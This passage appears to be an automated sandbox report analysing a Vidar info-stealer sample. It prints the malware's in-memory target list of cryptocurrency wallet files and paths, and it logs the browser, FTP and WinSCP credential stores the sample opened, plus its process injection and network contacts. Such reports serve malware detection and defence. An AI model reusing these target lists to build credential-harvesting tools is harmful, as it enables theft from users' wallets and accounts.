Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                      Source: aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002DD8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                      Source: aspnet_regiis.exe, 00000003.00000002.2652612690.0000000002C3A000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: \Coinomi\Coinomi\wallets\
                      Source: aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002DD8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                      Source: aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002DD8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                      Source: aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002DD8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                      Source: aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002DD8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                      Source: aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002DD8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                      Tries to harvest and steal Bitcoin Wallet information
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-coreJump to behavior
                      Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeKey opened: HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\ConfigurationJump to behavior
                      Tries to harvest and steal browser information (history, passwords, etc)
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\prefs.jsJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\places.sqliteJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\cookies.sqliteJump to behavior
                      Tries to harvest and steal ftp login credentials
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xmlJump to behavior
                      Tries to steal Crypto Currency Wallets
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\backups\Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\MultiDoge\Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\Binance\Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\Ledger Live\Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\atomic_qt\config\Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\Jump to behavior
                      Source: Yara matchFile source: 00000003.00000002.2652612690.0000000002BA1000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: aspnet_regiis.exe PID: 1420, type: MEMORYSTR

                      Remote Access Functionality

                      barindex
                      Yara detected Vidar
                      Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                      Yara detected Vidar stealer
                      Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                      Source: Yara matchFile source: 0.2.file.exe.6d5e2000.6.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.file.exe.6d5e2000.6.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.aspnet_regiis.exe.2a00000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.file.exe.6d5b0000.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000003.00000002.2652573382.0000000002A30000.00000002.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.2653530510.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.1439234839.000000006D5E2000.00000004.00000001.01000000.00000007.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: file.exe PID: 7116, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: aspnet_regiis.exe PID: 1420, type: MEMORYSTR
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_6CC50C40 sqlite3_bind_zeroblob,3_2_6CC50C40
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_6CC50D60 sqlite3_bind_parameter_name,3_2_6CC50D60
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_6CB78EA0 sqlite3_clear_bindings,3_2_6CB78EA0

                      Mitre Att&ck Matrix

                      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                      Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
                      Windows Management Instrumentation                      		1
                      DLL Side-Loading                      		1
                      DLL Side-Loading                      		1
                      Disable or Modify Tools                      		2
                      OS Credential Dumping                      		2
                      System Time Discovery                      		Remote Services1
                      Archive Collected Data                      		2
                      Ingress Tool Transfer                      		Exfiltration Over Other Network MediumAbuse Accessibility Features
                      CredentialsDomainsDefault Accounts1
                      Native API                      		Boot or Logon Initialization Scripts511
                      Process Injection                      		1
                      Deobfuscate/Decode Files or Information                      		1
                      Credentials in Registry                      		1
                      Account Discovery                      		Remote Desktop Protocol4
                      Data from Local System                      		21
                      Encrypted Channel                      		Exfiltration Over BluetoothNetwork Denial of Service
                      Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)4
                      Obfuscated Files or Information                      		Security Account Manager4
                      File and Directory Discovery                      		SMB/Windows Admin Shares1
                      Screen Capture                      		3
                      Non-Application Layer Protocol                      		Automated ExfiltrationData Encrypted for Impact
                      Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook12
                      Software Packing                      		NTDS54
                      System Information Discovery                      		Distributed Component Object ModelInput Capture114
                      Application Layer Protocol                      		Traffic DuplicationData Destruction
                      Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                      DLL Side-Loading                      		LSA Secrets151
                      Security Software Discovery                      		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                      Masquerading                      		Cached Domain Credentials31
                      Virtualization/Sandbox Evasion                      		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                      DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items31
                      Virtualization/Sandbox Evasion                      		DCSync12
                      Process Discovery                      		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                      Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job511
                      Process Injection                      		Proc Filesystem1
                      Application Window Discovery                      		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                      Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAtHTML Smuggling/etc/passwd and /etc/shadow1
                      System Owner/User Discovery                      		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

                      Behavior Graph

                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet
                      behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1524654 Sample: file.exe Startdate: 03/10/2024 Architecture: WINDOWS Score: 100 30 steamcommunity.com 2->30 38 Suricata IDS alerts for network traffic 2->38 40 Found malware configuration 2->40 42 Malicious sample detected (through community Yara rule) 2->42 44 11 other signatures 2->44 7 file.exe 3 2->7         started        signatures3 process4 file5 18 C:\Users\user\AppData\Roaming\msvcp110.dll, PE32 7->18 dropped 20 C:\Users\user\AppData\Local\...\file.exe.log, ASCII 7->20 dropped 46 Detected unpacking (changes PE section rights) 7->46 48 Contains functionality to inject code into remote processes 7->48 50 Writes to foreign memory regions 7->50 52 2 other signatures 7->52 11 aspnet_regiis.exe 147 7->11         started        16 conhost.exe 7->16         started        signatures6 process7 dnsIp8 32 49.12.197.9, 443, 49712, 49713 HETZNER-ASDE Germany 11->32 34 steamcommunity.com 104.102.49.254, 443, 49711 AKAMAI-ASUS United States 11->34 36 147.45.44.104, 49735, 80 FREE-NET-ASFREEnetEU Russian Federation 11->36 22 C:\ProgramData\softokn3.dll, PE32 11->22 dropped 24 C:\ProgramData\nss3.dll, PE32 11->24 dropped 26 C:\ProgramData\mozglue.dll, PE32 11->26 dropped 28 3 other files (1 malicious) 11->28 dropped 54 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 11->54 56 Found many strings related to Crypto-Wallets (likely being stolen) 11->56 58 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 11->58 60 5 other signatures 11->60 file9 signatures10

                      Screenshots

                      Thumbnails

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                      windows-stand

                      Antivirus, Machine Learning and Genetic Malware Detection

                      Initial Sample

                      SourceDetectionScannerLabelLink
                      file.exe30%VirustotalBrowse
                      file.exe100%Joe Sandbox ML

                      Dropped Files

                      SourceDetectionScannerLabelLink
                      C:\Users\user\AppData\Roaming\msvcp110.dll100%Joe Sandbox ML
                      C:\ProgramData\freebl3.dll0%ReversingLabs
                      C:\ProgramData\mozglue.dll0%ReversingLabs
                      C:\ProgramData\msvcp140.dll0%ReversingLabs
                      C:\ProgramData\nss3.dll0%ReversingLabs
                      C:\ProgramData\softokn3.dll0%ReversingLabs
                      C:\ProgramData\vcruntime140.dll0%ReversingLabs

                      Unpacked PE Files

                      No Antivirus matches

                      Domains

                      SourceDetectionScannerLabelLink
                      steamcommunity.com0%VirustotalBrowse

                      URLs

                      SourceDetectionScannerLabelLink
                      https://duckduckgo.com/chrome_newtab0%URL Reputationsafe
                      https://player.vimeo.com0%URL Reputationsafe
                      https://duckduckgo.com/ac/?q=0%URL Reputationsafe
                      https://store.steampowered.com/subscriber_agreement/0%URL Reputationsafe
                      https://www.gstatic.cn/recaptcha/0%URL Reputationsafe
                      https://community.akamai.steamstatic.com/public/javascript/applications/community/libraries~b28b7af60%URL Reputationsafe
                      http://www.valvesoftware.com/legal.htm0%URL Reputationsafe
                      https://community.akamai.steamstatic.com/public/css/promo/summer2017/stickers.css?v=HA2Yr5oy3FFG&amp0%URL Reputationsafe
                      https://community.akamai.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png0%URL Reputationsafe
                      https://community.akamai.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png0%URL Reputationsafe
